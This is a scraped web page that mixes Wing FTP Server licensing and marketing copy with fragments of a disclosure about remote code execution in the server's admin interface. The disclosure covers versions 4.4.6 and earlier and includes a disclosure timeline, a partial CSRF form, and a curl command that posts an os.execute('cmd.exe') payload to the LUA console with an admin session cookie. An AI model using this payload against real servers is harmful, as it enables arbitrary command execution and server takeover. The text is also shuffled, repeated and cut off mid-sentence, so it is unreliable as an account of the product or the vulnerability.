If your upgrade protection has expired or will expire soon, please contact us at license key will be sent to you via email within 12 hours after you place the order, please do not block the email address (or To register Wing FTP Server, just open WingFTP's administration and navigate to "Server -> License -> Register. However, if you want to get a longer protection period, you can choose from the options we offer after you click the purchase link. Please note that all the price listed below includes 2-year upgrade protection by default (the software itself never expires, all updates can be downloaded for free within two years). Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. All paid users will get FREE email and remote assistance support for a lifetime. If you need more features available in Standard / Secure / Corporate edition, please purchase a license and register it. After 30 days, you can continue using it as a Free edition for non-commercial use. Wing FTP Server is a highly functional, easy-to-use and secure FTP Server solution that can be used in Windows, Linux, Mac OSX and Solaris. No fix for authenticated RCE at this time. Wing FTP Server is distributed under a shareware license, and you can download and evaluate a fully functional trial version for 30 days. Requests a week delay before public disclosure. CSRF attack vector fixed in version 4.4.7. Vulnerability confirmed and new version 4.4.7 released. It supports multiple file transfer protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP, giving your clients flexibility in how they connect to the server. Vendor requests clarification on impact and various attack scenarios. File Size: 18.4 MB Wing FTP Server is an easy-to-use, secure, powerful, and free FTP server software for Windows, Linux, Mac OS, and Solaris. Vendor responds with requests for details of vulnerabilities.
:5466/admin_lua_script.html" method="POST" enctype="text/plain">

1) Either utilising the LUA Console interface directly and using the os.execute('') method.

2) POST directly using CURL with an authenticated cookie:

curl -i -s -k -X 'POST' -b 'admin_lang=english UIDADMIN=b8b208e2239f462c11641eaa10cde7b0' --data-binary $'command=os.execute(\'cmd.exe\')'

Any OS command can be inserted into the os.execute('') method. The attack leverages the LUA CLI to inject commands at the same privilege as the web server. The RCE can be exploited in two scenarios, either by a CSRF attack (the admin interface is vulnerable to CSRF attacks) or by being authenticated to the admin interface. Download App VNEWS FTP Server 2003-2021 All Rights Reserved. The admin interface of Wing FTP Server is vulnerable to a Remote Code Execution (RCE) vulnerability. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server." And it provides admins with a web based interface to administrate the server from anywhere. It supports a number of file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP server, giving your end-users flexibility in how they connect to the server. "Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. Vulnerability Type: Improper Control of Generation of Code Vulnerable Versions: 4.4.6 and all previous versions It supports multiple file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP, giving your end-users flexibility in how they connect to the server. Exploit Title: Wing FTP Server Remote Code Execution vulnerability Wing FTP Server Corporate 6.4.3 Wing FTP Server is a highly functional, easy-to-use and secure FTP Server solution that can be used in Windows, Linux, Mac OSX and Solaris.